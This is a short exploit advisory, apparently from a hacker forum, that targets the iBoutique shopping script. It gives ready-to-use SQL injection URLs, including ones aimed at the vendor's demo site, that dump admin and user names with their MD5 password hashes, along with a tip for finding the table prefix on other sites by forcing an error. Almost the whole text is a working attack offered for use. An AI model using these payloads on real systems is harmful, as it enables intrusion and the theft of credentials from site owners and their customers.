iBoutique SQL Injection Vulnerbilitys

[Gonzalez]

--==+================================================================================+==-- 
--==+                  iBoutique SQL Injection Vulnerbilitys                +==-- 
--==+================================================================================+==-- 



AUTHOR: t0pP8uZz & xprog 


SCRIPT DOWNLOAD: N/A 


SITE: [url]http://www.wscreator.com[/url] 


DORK: N/A 

DESCRIPTION: gain MD5 hash of any user including admin 

EXPLOITS: 

EXPLOIT 1 (admin): [url]http://www.server.com/SCRIPT_PATH/index.php?mod=products&ID=-1[/url] UNION ALL SELECT 1,2,3,concat(username,0x3a,password),5,@@version,7,8,9,10 FROM websiteadmin_admin_users 

EXPLOIT 2 (users): [url]http://www.server.com/SCRIPT_PATH/index.php?mod=products&ID=-1[/url] UNION ALL SELECT 1,2,3,concat(username,0x3a,password),5,@@version,7,8,9,10 FROM websiteadmin_users 

EXAMPLES: 

EXAMPLE 1 ON DEMO: [url]http://www.wscreator.com/iboutique/index.php?mod=products&ID=-1[/url] UNION ALL SELECT 1,2,3,concat(username,0x3a,password),5,@@version,7,8,9,10 FROM websiteadmin_admin_users 

EXAMPLE 2 ON DEMO: [url]http://www.wscreator.com/iboutique/index.php?mod=products&ID=-1[/url] UNION ALL SELECT 1,2,3,concat(username,0x3a,password),5,@@version,7,8,9,10 FROM websiteadmin_user 

NOTE/TIP: the table prefix may vary on diffrent sites (on demo its 'websiteadmin') to get prefix on other sites, you can cause a error 
the following way and show the sql query: http://server.com/iboutique/index.php?page=' that will spew out a error and  
you can then see the table prefix 

GREETZ: milw0rm.com, H4CKY0u.org, ~removed~ ! 


--==+================================================================================+==-- 
--==+                  iBoutique SQL Injection Vulnerbilitys                +==-- 
--==+================================================================================+==--